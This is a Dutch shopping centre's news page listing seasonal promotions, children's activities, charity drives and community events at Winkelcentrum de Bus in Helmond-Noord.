Winkelcentrum de Bus | Helmond-Noord

Nieuws over winkelcentrum de bus

🏆 Winkelcentrum de Bus kleurt de wijk oranje en laat vaders scoren! 🧡

Winkelcentrum de Bus viert haar 50-jarig jubileum met een fantastische EK-actie! 🥳 Vandaag bezorgen we oranje vlaggetjes en posters huis aan huis in Helmond-Noord. Versier je straat en maak kans op een straat BBQ t.w.v. €500! 🔥 Hang de poster voor je raam en laat je straat stralen! Heb je geen vlaggetjes ontvangen? Haal ze dan op bij de infobalie van Plus/Romonesco. Doe mee en maak er samen een feestelijke tijd van! 🎉

🏆Kom scoren op zaterdag 15 juni!🏆

Op zaterdag 15 juni verwelkomt Winkelcentrum de Bus bezoekers met een speciale Vaderdagactiviteit. Er is een barista die iedereen voorziet van gratis koffie, thee en ranja. Vaders (en anderen) kunnen hun voetbalvaardigheden testen in een tent met een doelwand. Elk gat in de doelwand staat voor een aantal punten en degenen met de meeste punten aan het eind van de dag winnen een prijs. Wie weet win jij een van de 2 seizoenskaarten van Helmond Sport! Hoe vet is dat? Neem iedereen mee zaterdag naar ons winkelcentrum en maak er een gezellige dag van!

Rad van fortuin met moederdag

Op zaterdag 11 mei, de dag voor Moederdag, staat Winkelcentrum de Bus garant voor een gezellige en feestelijke dag voor jong en oud. Vanaf 10.00 uur kunnen bezoekers genieten van gratis koffie, thee en ranja. Rad van Fortuin Een hoogtepunt van de dag is het Rad van Fortuin, waar klanten aan mogen draaien en altijd prijs hebben! Hoofdprijzen zijn maar liefst 15x shoptegoed ter waarde van € 50,-, beschikbaar gesteld door elk lid van de Ondernemersvereniging. Een welkome verrassing in deze dure tijden. Hoe werkt de actie? Klanten ontvangen van maandag 29 april t/m donderdag 8 mei een stempel bij elke aankoop in een van onze winkels. Bij 3 stickers is hun kaart al vol en kunnen ze deze inleveren bij Romonesco voor een Draai-aan-het-rad-kaart.  Om het rad te begeleiden hebben we onze mede-wijkbewoner en tonprater Rob Scheepers uitgenodigd, die op ludieke wijze zal zorgen voor een onvergetelijke draai-ervaring. Dit prijzenfestival is van 11.00 – 15.00 uur. De prijzen worden beschikbaar gesteld door de ondernemers van de winkeliersvereniging, die er samen steeds weer voor zorgen dat er leuke acties worden gehouden die niet alleen zorgen voor een gezellige sfeer, maar ook kansen bieden op mooie prijzen voor hun klanten. Kom dus langs op zaterdag 11 mei en vier Moederdag met ons mee in Winkelcentrum de Bus!

Winkelcentrum de Bus laat kinderwensen in vervulling aan.

Ons winkelcentrum bestaat dit jaar 50 jaar! Om dit te vieren hebben we dit jaar wel een hele speciale Paasactie georganiseerd. Kinderen mogen hun wensen kenbaar maken en een aantal van deze wensen gaan wij uit laten komen! Om deze actie tot een groot succes te maken, hebben we contact opgenomen met vier basisscholen in Helmond-Noord: De Rank, De Bundertjes, De Toermalijn en Kindcentrum Mozaïek. De leerlingen krijgen een kleurplaat waarop ze ook hun paaswens mogen tekenen of omschrijven.  Deze wens kan voor henzelf zijn, maar ook voor een ander. Denk bijvoorbeeld aan een bosje bloemen voor iemand die ziek is of die ze heel lief vinden. Het belangrijkste is dat de wensen voor de ondernemers in De Bus uitvoerbaar moeten zijn. Alle ingeleverde fleurige kleurplaten met wensen zullen in ons winkelcentrum worden opgehangen, zodat iedereen de creativiteit van de jeugd kan bewonderen en wat ze zouden wensen voor zichzelf of een ander. Op paaszaterdag 30 maart maken we de prijswinnaars bekend en dus welke wensen worden gerealiseerd. Daarnaast zal de paashaas rondlopen met een grabbelmand waaruit men een paasei kunnen grabbelen. Wie het gouden ei pakt, ontvangt een groot chocolade paasei! We nodigen alle kinderen en hun (groot)ouders uit om mee te doen aan deze fantastische actie en samen met ons te genieten van de Paasdagen.

Vier de Magie van Kerst in Winkelcentrum de BUS

Winkelcentrum de Bus maakt zich op voor een heerlijk Kerstweekend met gezellige activiteiten op 23 en 24 december. Op zaterdag 23 december is de kerstman van de partij! Hij trakteert op lekkernijen en staat klaar voor een gezellige foto met jou. Daarnaast kun je jezelf verwarmen met gratis koffie, thee, en warme chocolademelk, verzorgd door de gezellige koffiekar. Op zondag 24 december openen verschillende winkels hun deuren voor last-minute kerstinkopen. Tussen 11.00 en 13.00 uur vullen Erica en Irma de lucht met sfeervolle kerstliedjes. Klanten zijn van harte uitgenodigd om mee te zingen en te genieten van de warme klanken die de kerstsfeer compleet maken. Winkelcentrum de Bus nodigt iedereen uit om samen vast in de Kerststemming te komen!

Halloween dag bij Winkelcentrum De Bus; durf jij het aan?

Op zaterdag 28 oktober komt Winkelcentrum De Bus in Helmond-Noord tot leven met een dag vol huiveringwekkende avonturen tijdens hun speciale Halloweendag. Van 10.00 – 16.00 uur ben je welkome in de enge Spooktent! Durf jij het aan? Betreden op eigen risico! En alsof dat nog niet genoeg is, zullen enge figuren ronddwalen in het winkelcentrum, klaar om iedereen de stuipen op het lijf te jagen. Maar dat is nog niet alles! Voor de jonge avonturiers is er een puzzel-doe tocht georganiseerd. Volg de aanwijzingen en los de puzzels op, bij het inleveren van de je puzzel formulier is er een lekkere beloning! Bovendien wordt ook de mooist verklede deelnemer beloond met een speciaal prijsje. Bereid je voor spanning, sensatie en griezelig plezier! Details op een rijtje: Datum: Zaterdag, 28 oktober Tijdstip: 10.00-16.00 Locatie: Winkelcentrum De Bus, Helmond-Noord Om 16.00 uur is de prijsuitreiking van de puzzeltocht en voor degene die mooiste zijn verkleed!   *mede mogelijk gemaakt door Wijk Management Helmond

Speuren voor de speeltuin

🎉 Geweldig nieuws voor alle kinderen in Helmond-Noord! Winkelcentrum De Bus staat op het punt om opnieuw een spectaculaire actie te lanceren, en dit keer willen we je meenemen op een avontuur vol plezier, beweging en onvergetelijke herinneringen! In samenwerking met de basisscholen in de omgeving, willen we een fantastische speelmiddag organiseren in de prachtige Speeltuin Leonardus. We hebben deze geweldige plek gekozen omdat het niet alleen een ontmoetingsplaats is voor kinderen, maar ook een veilige haven waar ze naar hartenlust kunnen buitenspelen en bewegen. Hoe werkt het? In Winkelcentrum De Bus hangen we betoverende foto’s op van de verschillende speeltoestellen in Speeltuin Leonardus. Dit vormt het startpunt van een spannende puzzeltocht! Kinderen kunnen deelnemen door deelnamekaarten in te vullen, waarop ze de locaties noteren waar ze de foto’s hebben gevonden. En hier komt het leuke gedeelte: als de kinderen hun ingevulde deelnamekaart bij ons inleveren, krijgen ze een speciale strippenkaart voor Speeltuin Leonardus! Deze strippenkaart biedt toegang tot de speeltuin, een verfrissend ijsje, een verkwikkend drankje, iets lekkers én een prachtig cadeautje als aandenken aan deze onvergetelijke dag. De versnaperingen kunnen de kinderen ophalen in ons gezellige winkeltje. Maar er is meer! De kinderen hebben de vrijheid om zelf een dag naar keuze te kiezen in de zomervakantie om van deze geweldige speelmiddag te genieten. Op die manier kunnen ze samen met hun vriendjes en vriendinnetjes een energieke en gezonde middag vol plezier beleven! We zijn verheugd om aan te kondigen dat we de basisscholen De Rank, De Bundertjes, De Toermalijn en Kindcentrum Mozaïek hebben benaderd om deelnamekaarten te verspreiden. En het enthousiasme van deze scholen, evenals Speeltuin Leonardus, is werkelijk hartverwarmend! Dus, beste ouders, laat deze kans niet voorbijgaan! Doe mee aan onze geweldige actie en geef uw kinderen de kans om deel uit te maken van deze onvergetelijke speelmiddag. Kom langs in Winkelcentrum De Bus, ga op ontdekkingstocht naar de foto’s, vul de deelnamekaart in en ontvang een strippenkaart voor Speeltuin Leonardus. Het belooft een avontuur vol vreugde en beweging te worden dat uw kinderen nog lang zullen koesteren! Samen maken we de zomervakantie onvergetelijk. We kijken uit naar jullie komst en kunnen niet wachten om jullie stralende gezichten te zien terwijl jullie genieten van deze fantastische belevenis! Speuren kan van 15 juli t/m 26 augustus 2023

Paas speurtocht en kleurplaat

Ook hebben we voor de kinderen weer een leuke actie met Pasen. Via de basisscholen worden er weer kleurplaten uitgedeeld en via de deelnemende winkels. Daarnaast kunnen de kinderen ook lekker komen speuren in ons winkelcentrum en de zin zoeken en invullen op de kleurplaat. Deze kan worden ingeleverd bij Primera. Op Paaszaterdag maakt de Paashaas de winnaars bekend. Kom je dan ook gezellig even langs?

Pasen samen met Winkelcentrum de BUS

Zoals jullie van ons gewend zijn gaan we jullie weer verwennen met een leuke actie. Je kunt de komende weken weer iemand opgeven om te laten verrassen met een hele mooie PAASMAND! Deze is gevuld met de allerlekkerste, leuke en mooie producten van onze ondernemers. Dit jaar maar liefst ter waarde van 250 euro! Dus vul de kaart in en geef aan waarom diegene deze mooie PAASMAND verdiend. Opgeven kan tot 5 april 2023.

Hulp voor slachtoffers aardbeving

In 13 winkels staan collectebussen voor een donatie voor Giro 555 voor de slachtoffers van de aardbeving in Turkije en Syrië. De ondernemers verdubbelen het bedrag met een maximum van 2000 euro. Helpt u ook mee?

Plakken & Sparen

𝐁𝐞𝐬𝐭𝐞 𝐁𝐔𝐒-𝐤𝐥𝐚𝐧𝐭, 𝐖𝐢𝐣 𝐳𝐢𝐣𝐧 𝐛𝐥𝐢𝐣 𝐦𝐞𝐭 𝐣𝐨𝐮 𝐚𝐥𝐬 𝐤𝐥𝐚𝐧𝐭! We willen je graag helpen in deze best lastige tijd nu er zoveel dingen duurder worden. Daarom kun je de komende weken bij ons 𝐬𝐩𝐚𝐫𝐞𝐧 𝐯𝐨𝐨𝐫 𝐞𝐞𝐧 𝐆𝐑𝐀𝐓𝐈𝐒 𝐆𝐄𝐕𝐔𝐋𝐃𝐄 𝐁𝐔𝐒-𝐛𝐨𝐨𝐝𝐬𝐜𝐡𝐚𝐩𝐩𝐞𝐧𝐭𝐚𝐬! De deelnemende winkels hebben allemaal hun best gedaan om iets uit te zoeken waar je echt iets aan hebt om zo een goedgevuld boodschappenpakket ter waarde van maar liefst € 50,00 samen te stellen. 𝐃𝐨𝐞 𝐦𝐞𝐞 𝐞𝐧 𝐬𝐩𝐚𝐚𝐫 𝐯𝐨𝐨𝐫 𝐣𝐨𝐮𝐰 𝐆𝐑𝐀𝐓𝐈𝐒 𝐩𝐚𝐤𝐤𝐞𝐭!

Halloweenweken

Van 10 t/m 29 oktober zijn het weer HALLOWEEN weken bij ons winkelcentrum. Het winkelcentrum is sfeervol versierd. Op zaterdag 29 oktober is het echt Halloween. Verklede Halloweenfiguren delen opdrachten uit aan kinderen die meedoen met onze PUZZEL-DOE-TOCHT. Hier zijn leuke prijsjes mee te verdienen. Ook is er natuurlijk weer een prijs voor de best verklede deelnemer. Doe jij ook mee? We zien je graag.

Speuren voor Speeltuin

Na een hele succesvolle actie vorig jaar, willen we de speeltuinactie dit jaar weer organiseren. In het kader van jeugd in beweging brengen en de jeugd weer meer samen laten buiten spelen, willen we samen met de basisscholen in Helmond-Noord een actie opzetten met als doel een leuke speelmiddag in Speeltuin Leonardus. Hiermee ondersteunen we tegelijk Speeltuin Leonardus, een hele mooie en belangrijke plek in Helmond-Noord waar kinderen elkaar kunnen ontmoeten en veilig buiten kunnen spelen en bewegen. In Winkelcentrum de Bus hangen we foto's op van verschillende speeltoestellen van Speeltuin Leonardus. Het is een soort puzzeltocht. De kinderen kunnen op deelnamekaarten invullen waar ze de foto's hebben gevonden.  Als zij de deelnamekaart komen inleveren krijgen ze van ons een strippenkaart voor de Speeltuin. Op de strippenkaart staat het volgende: Entree voor de speeltuin, een ijsje, een drankje, iets lekkers en een aandenken aan de dag.  De versnaperingen mogen de kinderen in het winkeltje gaan ophalen.  Bij het ophalen van de aandenkens leveren de kinderen hun strippenkaart in zodat wij de ingeleverde strippenkaarten met de speeltuin af kunnen rekenen. Zo hebben de kinderen een fijne gezonde intensieve beweegmiddag met vriendjes en vriendinnetjes. Deze middag kunnen ze zelf inplannen op een dag naar keuze in de zomervakantie. De deelnamekaarten zullen via de basisscholen worden verspreid. Hiervoor hebben we Basisschool de Rank, De Bundertjes, De Toermalijn en Kindcentrum Mozaïek. Iedereen was erg enthousiast om weer mee te doen. Kortom, weer een mooie samenwerking tussen De Bus, scholen, Leonardus Speeltuin en Wijkmanagement Helmond.  Kom jij ook speuren voor de Leonardus Speeltuin?

Moederdag; draai en win!

Moederdag actie Op zaterdag 7 mei, de dag voor moederdag organiseren we weer een gezellige, feestelijke dag in Winkelcentrum de Bus. Er zal een barista staan met een koffie/thee/chocomel tuc-tuc die mensen van gratis koffie zal voorzien. Voor kinderen is er ranja. Daarnaast komt er een Rad van Fortuin te staan waar klanten aan mogen draaien en altijd prijs hebben. De hoofdprijs is shoptegoed twv maar liefst € 500,-!!! Dat is voor iedereen een zeer welkom bedrag in deze dure tijden. Hoe werkt de actie? Klanten krijgen van vrijdag 29/4 t/m donderdag 5/5 een sticker als ze een aankoop doen in 1 van onze winkels. Bij 3 stickers is hun kaart al vol. Deze kaart leveren ze in tegen een Draai-aan-het-rad-kaart. Ze hebben dan altijd prijs, maar op deze manier kunnen wij inschatten hoeveel prijzen we uit moeten gaan reiken. Er is ook een hoofdprijs van € 500,- shoptegoed, verdeeld in 100 waardebonnen van elk € 5,-. Op zaterdag 7 mei presenteert onze mede-wijkbewoner en tonprater Rob Scheepers in de ochtend. Bart Abels, o.a. bekend van de Sinterklaasintocht van Helmond, zal in de middag alles op een leuke manier aan elkaar praten. De prijzen worden uiteraard beschikbaar gesteld door de ondernemers. Tevens nodigen we onze buren, de bewoners van Savant de Eeuwsels uit voor een gratis kopje koffie en een draai aan het rad. Deze mensen hebben ook lang genoeg binnen gezeten ivm corona en verdienen een gezellige uitstapje. Om alles in goede banen te leiden zullen we ism de LEV groep en de beveiligers in opleiding van het ROC ter AA aan de Keizerin Marialaan zorgen dat er voldoende mensen zijn om toezicht te houden.

Paas actie, wie verdient deze PAASMAND?

Na een lange en ellendige coronatijd met vele beperkingen, vinden de ondernemers van Winkelcentrum de Bus het tijd om juist die mensen in het zonnetje te zetten die voor anderen de coronaperiode draaglijker hebben gemaakt. Welk moment is daar geschikter voor dan het vrolijk Paasfeest, het feest in het vroege voorjaar waarin we de (weder-)geboorte vieren. We kunnen namelijk weer nieuwe dingen gaan doen, maar laten we daarbij nog wel even stilstaan bij alle hulp die we gehad hebben in het recente verleden. De ondernemers gaan 10 boodschappenpakketten weggeven aan mensen die echt voor anderen hebben klaar gestaan en die nu zelf een steuntje in de rug kunnen gebruiken. Mensen mogen iemand opgeven via een wenskaartje en geven ook de reden op waarom juist die persoon een bedank-pakket zou moeten ontvangen. In de winkels worden de wenskaartjes uitgereikt. Er zal een brievenbus staan om deze wenskaartjes in te doen in de weken voor Pasen. Om de actie meer te laten leven, zullen we een aantal wenskaartjes ophangen in een grote paas tak op het plein in ons winkelcentrum. Op zaterdag 16 april reiken we de boodschappenpakketten uit. Hoe zien die pakketten eruit? Wie kunnen de pakketten er nou vrolijker uit laten zien dan kinderen? We gaan de samenwerking aan met 4 basisscholen: De Rank, De Bundertjes, De Toermalijn en Kindcentrum Mozaïek. Zij krijgen de blanco dozen die ze geheel naar eigen inzicht mogen versieren en decoreren. Daarnaast mogen de scholen ook ieder 1 persoon aanwijzen die altijd veel voor hen doet en altijd voor iedereen klaar staat, bijvoorbeeld de onmisbare conciërge, een vrijwillige ouder of iemand anders die ze zelf in het zonnetje willen zetten. Nadat we de gedecoreerde dozen hebben terug ontvangen van de scholen, zullen de ondernemers ze gaan vullen. Elke doos zal goed gevuld zijn, ongeveer ter waarde van € 100,-. Daarnaast krijgen de scholen kaartjes waarmee de kinderen op zaterdag 16 april in het winkelcentrum letters kunnen gaan zoeken die een woord vormen. Elk deelnemend kind ontvangt van de paashaas iets lekkers.

Oekraïne actie

Het zal je maar gebeuren: je moet rennen voor je leven, vluchten van alles wat je in je leven hebt opgebouwd, je hebt nauwelijks tijd om 1 koffer te pakken en hopelijk heb je aan je familiefoto’s gedacht. Als vrouw mag je het land verlaten met je jongste kinderen. Heb je zonen die net de volwassen leeftijd hebben bereikt, dan moet je die achterlaten bij je man om te vechten voor de vrijheid in je thuisland. Als vrouw moet je ook aan je jonge kinderen denken vlucht je je land uit. In je buurlanden wordt je opgevangen en ga je in een bus naar een vreemd land, een paar duizend kilometer ver weg, niet wetende of je de rest van je familie ooit nog terug gaat zien en of je een thuis hebt om naar terug te keren. Deze mensen wilden thuis niet weg, ze zijn gevlucht omdat dat de enige mogelijkheid was om te kunnen overleven van het oorlogsgeweld, en dat alles in een Europees land… In het Dr. Knippenbergcollege komen 150-200 Oekraïense vluchtelingen. Ze zijn hier veilig, hebben een dak boven hun hoofd en te eten. Het belangrijkste dat wij als ondernemers van Winkelcentrum de Bus kunnen doen, is het gevoel overbrengen dat deze mensen zich welkom voelen in onze buurt, een stukje persoonlijk geluk dus. We hebben daartoe 2-talige banners en posters in ons winkelcentrum geplaatst om die boodschap over te brengen. Daarnaast hebben we met de ondernemers overlegd om vanuit de ondernemersvereniging iets extra’s te doen. Er werd unaniem besloten om € 6.000,- beschikbaar te stellen in 1200 waardebonnen van elk € 5,- die vrij te besteden zijn in de winkels in Winkelcentrum de Bus. Elke Oekraïense vluchteling, zowel jong als oud krijgt dus 6 waardebonnen van elk € 5,-, zodat ze iets kunnen kopen voor zichzelf, zoals kleding of een bezoekje aan de kapper, iets om te spelen voor de kinderen, of iets lekkers om te eten. Hopelijk kunnen we met onze welkomstactie weer een glimlach op het gezicht toveren van deze vluchtelingen, zodat ze misschien heel even hun ellende kunnen vergeten.

Halloween weken

Op zaterdag 30 oktober a.s. organiseert Ondernemersvereniging de Bus een Halloweendag in Winkelcentrum de Bus. Het hele winkelcentrum zal in het teken staan van Halloween, al vanaf de tweede week van oktober om alvast in de stemming te komen. Vanaf dat moment worden de bewoners van de  Pannehoeve, de Eeuwsels en de Moeraseik, uitgenodigd om alleen of met begeleider een gratis kopje koffie met een Halloween gebakje te komen nuttigen in ons winkelcentrum bij Supervlaai zodat ze een rustig moment uit kunnen zoeken, want niet iedereen is al heel comfortabel met het loslaten van de 1,5 m. Ondertussen kan men genieten van de mooie decoraties, een leuk uitje dus. Op 30 okt. zullen er verklede acteurs rond lopen die elk een opdracht meekrijgen en worden er prijzen uitgereikt voor de best verklede bezoekers. Kinderen krijgen deze dag een snoepzak. Deze dag zal er ook een grote donkere tent staan waarin echt gegriezeld kan worden. Ook zullen diverse winkels kramen buiten hebben staan. In samenwerking met de LEV groep zullen we weer studenten beveiliging van het ROC ter AA uitnodigen voor een stagedag. Kortom, we denken hiermee een veilige, gezellige dag te kunnen organiseren voor alle Helmonders en een koffie-uitje voor ouderen uit Helmond-Noord.

Back to school

De scholen zijn weer begonnen! Zijn alle rugzakken goed gevuld met schoolspullen? In ons winkelcentrum zijn er diverse winkels waar je nog schoolspullen kunt kopen. En om de broodtrommels gezond & lekker te vullen moet je natuurlijk ook bij ons zijn.

Speuren voor de speeltuin!

𝐖𝐞 𝐡𝐞𝐛𝐛𝐞𝐧 𝐰𝐞𝐞𝐫 𝐞𝐞𝐧 𝐡𝐞𝐥𝐞 𝐥𝐞𝐮𝐤𝐞 𝐀𝐂𝐓𝐈𝐄!Deze keer om de kinderen in onze wijk meer te laten bewegen! In het kader van jeugd in beweging brengen en de jeugd weer meer samen te laten buiten spelen, hebben we samen met de basisscholen in Helmond-Noord een actie opgezet met als doel een leuke speelmiddag in Speeltuin Leonardus. Hiermee ondersteunen we tegelijk Speeltuin Leonardus, een hele mooie en belangrijke plek in Helmond-Noord waar kinderen elkaar kunnen ontmoeten en veilig buiten kunnen spelen en bewegen.De kinderen mogen in de zomervakantie komen speuren met hun speurkaart! Is deze ingevuld dan kunnen ze deze inleveren bij Bakkerij der Kinderen en ontvangen een echte strippenkaart voor de Leonardus Speeltuin! Hoe leuk is dat! Op de strippenkaart staat het volgende: Entree voor de speeltuin, een ijsje, een drankje, iets lekkers en een aandenken aan de dag. De versnaperingen mogen de kinderen in het winkeltje gaan ophalen. Aan het einde van de dag kunnen ze strippenkaart inleveren en ontvangen ze ook nog een leuk cadeautje. Zo hebben de kinderen een fijne gezonde intensieve beweegmiddag met vriendjes en vriendinnetjes. Deze middag kunnen ze zelf inplannen op een dag naar keuze in de zomervakantie. We wensen jullie allemaal een heerlijke vakantie met veel speur- en speelplezier!

Actie “fiets aan de ketting”.

De laatste tijd zijn er erg veel fietsendiefstallen rondom Winkelcentrum de Bus. In overleg met de politie, vonden we dat hier iets aan gedaan moet worden. We willen klanten waarschuwen op een ludieke manier. Ze alert maken en zorgen dat ze ten alle tijden hun fiets goed afsluiten en aan de ketting leggen. Inmiddels staan er bij diverse entrees van Winkelcentrum de Bus al een paar borden met waarschuwingsposters in de huisstijl van De Bus.  Daarna hebben we deurhangers laten maken met waarschuwingsteksten erop om de fiets aan de ketting te leggen. Deze hangers zullen we met regelmaat aan geparkeerde fietsen gaan hangen. Als klapstuk van deze actie hebben we samenwerking gezocht met het ROC ter AA afd. Beveiliging om een aantal dagen een stageplek te bieden aan jongeren in de beveiliging. Zij zullen dan klanten wijzen op het belang van een het aan de kabel leggen van je fiets en waar mensen nog geen kabelslot hebben, om deze namens Winkelcentrum de Bus en FOH uit te reiken. Hiermee voorkomen we veel schade in de toekomst en creëren we op een leuke manier bewustwording om goed op je eigendommen te letten. Wij hopen dan ook dat het allemaal lukt om dit georganiseerd te krijgen. Met de wijkagent heb ik telefonisch en via de app contact gehad en hij is enthousiast dat we actie ondernemen als winkelcentrum. Er is dus breed draagvlak voor deze actie. Wellicht is het zelfs een goed idee voor andere winkelcentra of Helmond centrum. Wij gaan ervoor dat onze klanten veilig met hun eigen fiets naar huis kunnen.

Ondernemers Winkelcentrum de Bus helpen elkaar

De ondernemers in de Bus zijn altijd actief en organiseren veel voor hun klanten. Maar nu hebben ze een actie verzonnen die niet alleen voor hun klanten een goede deal is, maar vooral voor de collegae ondernemers die door de coronamaatregelen helaas hun winkel hebben moeten sluiten. De winkeliers die nog wel open mogen gaan daarom helpen, samen met hun klanten.  Klanten van winkelcentrum de Bus kunnen 3 kassabonnen van de deelnemende winkels inleveren bij Bakkerij der Kinderen of Romonesco Slager-Traiteur en ontvangen dan direct een voucher van € 2,50.  Deze is na de lockdown te besteden bij een van de winkels die nu dicht zijn. Hoe leuk is dit? Met deze actie: “steun de lockdown winkeliers van winkelcentrum de Bus” laten ze weer zien hoe de verbondenheid onder de diverse ondernemers is. Helpen jullie ook mee? Deelnemende winkels: Supervlaai, Romonesco Slager-Traiteur, Plus Bouwmans, Hans Deelen Groenten en Fruit, Bakkerij der Kinderen, Duijmelinck Delicatessen, Restaria de Bus, Vis & CO, Chinees Restaurant Happy Valley Winkels waar straks de vouchers zijn in te leveren: Karakter Kapper, Marie's Fashion, Primera de Luifel, Comtr Gordijnen, Onje Clonje, Feestshop de Ballon De actieperiode om te sparen loopt van 25 januari t/m 7 februari. 

31 oktober wordt het griezelen

KOM ALVAST IN DE SFEER want zaterdag 31 oktober wordt het griezelen in het winkelcentrum!! De video hieronder toont alvast een sneak preview. Wij mochten gisteren namelijk al voorproeven bij Feestshop De Ballon en bij Maries fashion !! Deze griezels staan op zaterdag 31 oktober vanaf 10 u. samen in een tent waar je doorheen kunt lopen. Bekijk hier de video: https://bit.ly/3kjj7mu Maar als je niet zo lang kunt wachten, dan loop je toch bij beide winkels binnen! Happy Halloween

Hou je brievenbus in de gaten

Hou je brievenbus in de gaten want met de Traverse wordt een gevulde actie-envelop meegeleverd. In de envelop zitten mooie Halloween weken acties én een bon voor een gratis kopje koffie of thee to go. Dus veilig in deze corona tijden. Het winkelcentrum biedt ruimte genoeg om even van je koffietje of thee te genieten. En op 31 oktober kunnen vooral de kinderen nog net iets meer van de Halloween komen genieten, op veilige 1,5 m uiteraard tijdens ons Happy Halloween event We hopen je komende dagen en zeker op de 31e te mogen ontvangen.

Happy Halloween in de Bus

Reserveer alvast zaterdag 31 oktober in je agenda! Van 19 tot en met 30 oktober viert winkelcentrum de Bus Happy Halloween. Het winkelcentrum zal sfeervol versierd zijn net als vorig jaar dankzij de bijdrage van feestwinkel De Ballon. Gedurende deze 2 weken zijn er legio acties van de winkeliers met als grande finale de feestelijke afsluiting op zaterdag 31 oktober. Hou je brievenbus komende weken in de gaten. Het winkelcentrum distribueert 1.000 bonnen in de lokale verzorgingstehuizen en 10.000 in de omliggende wijken via de Traverse, waarmee je een gratis kop koffie of thee kunt nuttigen in het winkelcentrum. Het Winkelcentrum is maatschappelijk betrokken en wil graag iets voor de mensen betekenen. Met dit kopje koffie of thee willen we een moment van gezelligheid en aandacht aanbieden in deze vervelende tijden. Het winkelcentrum is groot, overdekt en heeft verschillende bankjes binnen en buiten waar je rustig even van een drankje kan genieten. En uiteraard worden de RIVM-richtlijnen nageleefd. Zaterdag 31 oktober 10-16 uur. Op zaterdag 31 oktober tussen 10 en 16 uur kunnen kinderen meedoen aan een letterpuzzel speurtocht door het winkelcentrum. Kinderen die in Halloween sfeer verkleed naar het winkelcentrum komen, kunnen zich bij de tovenaar laten jureren. Zowel voor de speurtocht als de mooist verklede kinderen zijn mooie prijzen te winnen. De prijsuitreiking is om 16.00 uur bij de tovenaar. Leuke aanbiedingen Daarnaast staan er op deze dag voor iedereen diverse kraampjes door het gehele winkelcentrum met leuke aanbiedingen. Dus kom naar het winkelcentrum en laat je verrassen!

Nieuwe look dankzij Oogenlust

Wie heeft het nog niet bewonderd? Dankzij Oogenlust is het winkelcentrum opgeluisterd door kleurrijk gevulde plantenbakken in de stijl van ons winkelcentrum. Helemaal passend in onze huisstijl. We zijn er zelf zo ontzettend blij mee. Maar behalve de plantenbakken hebben onze hanglampen ook de bekende kleurrijke 'streepjescode' gekregen. Heb je het nog niet gezien? Kom dan gauw een keer kijken! En wil je een keer een uniek bijzonder mooi tuincentrum bekijken? Breng dan een bezoekje aan Oogenlust. Een uitje waard!

Braderie in Winkelcentrum de Bus

Op zondag 22 september organiseert winkelcentrum De Bus een grootse braderie met vele kramen met mooie artikelen. Tevens zullen alle winkels geopend zijn. Braderie in Winkelcentrum de BusVoor de kinderen is er vertier. Tijdens deze dag is er live muziek  van het Duo Xplain.

Kom brunchen in het winkelcentrum!

Koop bij 5 verschillende winkels tijdens de actieperiode en ontvang één stempel per winkel per aankoop. Heeft u 5 vakjes vol dan kunt u uw spaarkaart inleveren om deel te nemen aan de gezamenlijke brunch zondag 8 september van 12.00-14.00 uur. Sparen kan van 8 juli t/m 31 augustus. Spaarkaarten zijn te verkrijgen bij de deelnemende winkels (zolang de voorraad strekt).

Kids Day

Zaterdag 25 mei van 11.00 tot 16.00 uur is het Kids Day! Dan organiseren wij een leuke dag voor de kinderen. Er zijn gratis suikerspinnen en popcorn en er loopt een clown door het winkelcentrum die balonnenfiguurtjes maakt en uitdeelt.

Tropical Day

Zaterdag 18 mei van 11.00 tot 16.00 uur is het Tropical Day! Kom gezellig dansen en proeven, want op zaterdag 18 mei staat winkelcentrum de Bus in het teken van tropische sferen. Zo schenken we gratis alcohol vrije cocktails voor jong en oud en draait er vanaf 12.00 uur een DJ.

Spaar voor een gratis doosje aardbeien!

Van 23 april t/t 4 mei kunt u bij de deelnemende winkels in winkelcentrum de Bus sparen voor een gratis doosje aardbeien. Wat moet je doen? Koop bij 5 verschillende winkels tijdens de actieperiode en ontvang één spaarkaart per aankoop. Heeft u 5 verschillende spaarkaarten? Lever deze dan uiterlijk 4 mei in bij Hans Deelen Groente & Fruit. Haal zaterdag 11 mei je gratis aardbeien af bij de kraam op het plein.

Doe mee met de Paas speurtocht en win een chocolade Paashaas

Van 8 t/m 19 april vindt er op het winkelcentrum een leuke Paas Speurtocht plaats. Speur naar 16 letters in de deelnemende winkels en los daarmee de reus op. Haal uw deelnamekaart op in de deelnemende winkels en maak kans op één van de 16 mega chocolade Paashazen!

Maak kans op deze goedgevulde shopper t.w.v. 60 euro!

Bij besteding vanaf € 5,- ontvangt u bij de deelnemende winkels één kraskaart. Elke maand geven wij 10 goed gevulde shoppers t.w.v. € 60,-* weg. Tevens maakt u kans op één van de niet gevulde maar leuke Winkelcentrum de Bus shoppers.* Heeft u een hoofdprijs gekrast? Vul dan op uw kraskaart alle gegevens in en lever deze kaart in bij Bakkerij der Kinderen. Maandelijks verdelen wij de 10 hoofdprijzen op een vast moment onder de winnaars. Heeft u een troostprijs gekrast? Dan kunt een niet gevulde shopper afhalen in een van de deelnemende winkels. Kijk hier voor de actievoorwaarden. * Zolang de voorraad strekt.

Extra koopzondag

Op zondag 23 van 12.00 - 17.00 uur zijn er vele winkels in Winkelcentrum de Bus extra geopend in verband met de feestdagen. U bent dus van harte welkom om op een andere moment uw boodschappen te komen doen in deze toch al drukke dagen. Ook is er bezoek van de kerstman, hij deelt lekkers uit en je mag met hem op de foto.

Hij komt… hij komt…

Zaterdag 24 november is het weer zover! Sinterklaas en zijn Pieten bezoeken ons winkelcentrum weer! Vanaf 10.30 uur - 12.30 uur is er weer volop gezelligheid voor de kleintjes. Kom op tijd voor de leuke show door Bart & Theo en zing samen voor een warm onthaal van de Sint! De Pieten delen weer volop lekkers uit! Zorg dat jij erbij bent want het gaat weer een gezellige ochtend worden.

Spaar & Win bij Winkelcentrum de Bus!

Vanaf zaterdag 24 november maakt u 4 weken lang kans op een waardecheque van 25, 50 of 100 euro!* Hoe maakt u kans op één van deze prachtige prijzen? Verzamel van 15 november t/m 14 december 2018 al uw kassabonnen van uw aankopen in Winkelcentrum de Bus. Stop voor minimaal € 50,- aan kassabonnen, besteed bij tenminste 3 verschillende winkels in de deelname envelop en deponeer deze vervolgens in de daarvoor bestemde actiebrievenbus in het Winkelcentrum. U kunt zo vaak meedoen als uw wilt en maakt 4 weken lang kans op een prijs! De prijsuitreikingen vinden plaats op: zaterdag 24/11 (door Sint), 1/12, 8/12 en 15/12. * Te besteden in Winkelcentrum de Bus bij de deelnemende winkeliers.

Braderie in Winkelcentrum de Bus

